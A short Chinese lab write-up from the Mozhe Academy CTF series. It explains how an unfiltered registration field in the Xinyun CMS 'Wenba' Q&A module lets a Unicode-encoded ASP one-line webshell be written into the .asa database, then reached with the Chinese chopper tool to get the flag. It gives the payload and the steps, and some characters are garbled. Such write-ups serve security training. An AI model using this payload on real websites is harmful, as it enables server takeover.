墨者学院 - CMS系统漏洞分析溯源(第3题)

一、漏洞简介

新云网站内容管理系统是一套开源的WEB网站管理系统，采用目前非常成熟的ASP+Access/SQL开发而成。使用它，我们可以很方便的管理自己的网站，目前新云网站内容管理系统最新的版本是v4.0.0 SP2。本文要介绍的捕洞就出在新云网站内容管理系统v4.0.0 SP1以及未打官方最新补丁的v4.0.O SP2的问吧系统中。

新云的问吧是类似百度知道的互动知识问答分享平台，问吧采用自己的数据库，数据库文件为.asa格式，由于过滤不严，导致可以向数据库中插入一句话木马，从而拿到webshell。

二、测试漏洞

要想利用漏洞，我们需要先注册一个用户，在注册信息中想方设法插入我们的一句话木马。点“用户注册”来注册一个用户，“用户名”、“登录密码”、“邮件地址”等都可以随便填写，但“密码问题”需要特别注意，要填写“+撺数畲整煺焕敞蹉V=-|悄”，也就是<% execute request("a")%>a经过Unicode转码后的代码。

三、实战
1.注册信息全部填写完毕后点“立即注册”按钮，注册成功后我们的一句话木马就插入到数据库中了

密码问题框中插入一句话木马

2.问吧数据库的默认地址是问吧耳录下的data目录下的ask_newasp.asa，直接在浏览器中访问，看到了数据库的代码，拉到网页最下面，看到了熟悉的“类型不匹配：'execute'”，说明一句话木马已经成功的插入到数据库中了。

一句话木马插入成功g

3.使用菜刀链接获取flag

实战操作：http://www.weixianmanbu.com/article/1618.html